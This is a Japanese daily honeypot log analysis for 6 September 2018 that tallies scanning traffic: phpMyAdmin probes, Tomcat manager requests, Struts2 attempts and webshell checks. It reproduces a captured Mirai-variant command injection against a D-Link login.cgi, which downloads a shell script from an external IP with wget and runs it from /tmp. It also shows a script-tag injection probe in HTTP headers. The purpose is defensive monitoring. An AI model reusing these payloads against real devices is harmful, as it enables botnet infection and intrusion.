ハニーポットのログ分析(2018/09/06)
WOWhoneypotの2018-09-06(運用 日目)の簡易分析です。
本日の総アクセス件数は 193件です。以下が全アクセスログです。
52 2018-09-06 GET /manager/html
31 2018-09-06 GET /
7 2018-09-06 POST /index.action
5 2018-09-06 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
3 2018-09-06 GET /robots.txt
2 2018-09-06 GET /xampp/phpmyadmin/index.php
2 2018-09-06 GET /www/phpMyAdmin/index.php
2 2018-09-06 GET /web/phpMyAdmin/index.php
2 2018-09-06 GET /typo3/phpmyadmin/index.php
2 2018-09-06 GET /tools/phpMyAdmin/index.php
2 2018-09-06 GET /pmd/index.php
2 2018-09-06 GET /pma-old/index.php
2 2018-09-06 GET /pmamy/index.php
2 2018-09-06 GET /pmamy2/index.php
2 2018-09-06 GET /PMA/index.php
2 2018-09-06 GET /pma/index.php
2 2018-09-06 GET /PMA2/index.php
2 2018-09-06 GET /phpMyAdmin/phpMyAdmin/index.php
2 2018-09-06 GET /phpmyadmin/phpmyadmin/index.php
2 2018-09-06 GET /phpMyAdminold/index.php
2 2018-09-06 GET /phpMyAdmin.old/index.php
2 2018-09-06 GET /phpmyadmin-old/index.php
2 2018-09-06 GET /phpMyAdmin/index.php
2 2018-09-06 GET /phpmyadmin/index.php
2 2018-09-06 GET /phpmyadmin2/index.php
2 2018-09-06 GET /phpmyadmin1/index.php
2 2018-09-06 GET /phpmyadmin0/index.php
2 2018-09-06 GET /phpma/index.php
2 2018-09-06 GET /phpadmin/index.php
2 2018-09-06 GET /mysql/index.php
2 2018-09-06 GET /mysqladmin/index.php
2 2018-09-06 GET /mysql-admin/index.php
2 2018-09-06 GET /myadmin/index.php
2 2018-09-06 GET /myadmin2/index.php
2 2018-09-06 GET /index.php
2 2018-09-06 GET /db/index.php
2 2018-09-06 GET /dbadmin/index.php
2 2018-09-06 GET /claroline/phpMyAdmin/index.php
2 2018-09-06 GET /admin/PMA/index.php
2 2018-09-06 GET /admin/pma/index.php
2 2018-09-06 GET /admin/phpMyAdmin/index.php
2 2018-09-06 GET /admin/phpmyadmin/index.php
2 2018-09-06 GET /admin/phpmyadmin2/index.php
2 2018-09-06 GET /admin/mysql/index.php
2 2018-09-06 GET /admin/mysql2/index.php
2 2018-09-06 GET /admin/index.php
1 2018-09-06 PROPFIND /
1 2018-09-06 POST /xx.php
1 2018-09-06 POST /xw.php
1 2018-09-06 POST /wuwu11.php
1 2018-09-06 POST /w.php
1 2018-09-06 POST /s.php
1 2018-09-06 POST /sheep.php
1 2018-09-06 POST /db_session.init.php
1 2018-09-06 POST /db.init.php
1 2018-09-06 HEAD /
1 2018-09-06 GET /sitemap.xml
1 2018-09-06 GET @research.aegis.network/
1 2018-09-06 GET /ads.txt
phpMyAdmin関連(82件)とWebshellの設置調査(8件)と/へのアクセスを除外したアクセス数です。
52 2018-09-06 GET /manager/html
7 2018-09-06 POST /index.action
5 2018-09-06 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
3 2018-09-06 GET /robots.txt
1 2018-09-06 GET /sitemap.xml
1 2018-09-06 GET @research.aegis.network/
1 2018-09-06 GET /ads.txt
本日多かったのはTomcatの管理ページへのアクセスです。
また前日に引き続き、Struts2を狙った攻撃も複数来ています。
D-Linkを狙ったMirai亜種は全てUAはHakai/2.0でした
新規で見た以下のものは、何かのbotプロジェクトでしょうか。
GET @research.aegis.network/ HTTP/1.0
User-Agent: <script src="//research.aegis[.]network/test.js"></script>
Referer: <script src="//research.aegis[.]network/test.js"></script>
Accept: */*GET /ads.txt HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Dataprovider.com;)
Connection: Close
urlscan.ioでサーチしてみたところ、過去に 調査している方がいたようでヒットしました。
https://urlscan.io/result/753b9df9-ebc5-4824-8509-a00b53618da9/
https://urlscan.io/result/dd0ee5bb-6955-4f5d-8170-b40d08020330/
本日のドメインでのアクセスは3つのIPから合計で以下のアクセスがありました
7 GET /
3 GET /robots.txt
1 GET /sitemap.xml
1 GET /ads.txt
本日のハンティングログは以下です。Mirai亜種です。
5 2018-09-06 wget hxxp://77.87.77[.]250/izuku.sh
以上です。
